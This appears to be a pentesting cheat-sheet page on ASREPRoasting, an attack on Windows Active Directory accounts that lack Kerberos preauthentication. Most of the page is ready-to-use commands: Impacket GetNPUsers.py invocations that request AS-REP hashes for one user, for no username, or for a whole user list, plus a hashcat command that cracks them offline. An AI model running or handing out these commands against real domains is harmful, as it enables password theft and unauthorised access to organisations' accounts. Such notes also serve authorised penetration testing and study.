ASREPRoast
Brief
ASREPRoast is about retrieving crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled.
This isnโt as useful as Kerberoasting, as accounts have to have DONT_REQ_PREAUTH() explicitly set for them to be vulnerable and youโre still reliant upon weak password complexity for the attack to work. But who knows, might be the only weak point you need.
Now, if you can enumerate accounts in a Windows domain that donโt require Kerberos preauthentication, you can easily request a piece of encrypted information for said accounts and efficiently crack the material offline, revealing the userโs password.
To do that you need to :
Send the KRB_AS_REQ to get the KRB_AS_REP with the encrypted information, to do so :
If you have username :
GetNPUser.py $domain/$username -no-pass -dc-ip $ip -request
If you have no username :
GetNPUser.py $domain/ -no-pass -dc-ip $ip -request
Crack hashes :
hashcat -m 18200 ticket wordlist
# MISC of commands
# list of users in users file
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $ip $domain/${user} | grep -v Impacket; done
GetNPUsers.py -dc-ip $ip -request $domain/
GetNPUsers.py -dc-ip $ip -request $domain/ -format hashcat/john
GetNPUsers.py -dc-ip $ip -usersfile users.txt $domain/
GetNPUsers.py $domain/backup -no-pass
GetNPUsers.py -no-pass $domain/ -usersfile users.txt -format hashcat -outputfile hashes.txtLast updated
Was this helpful?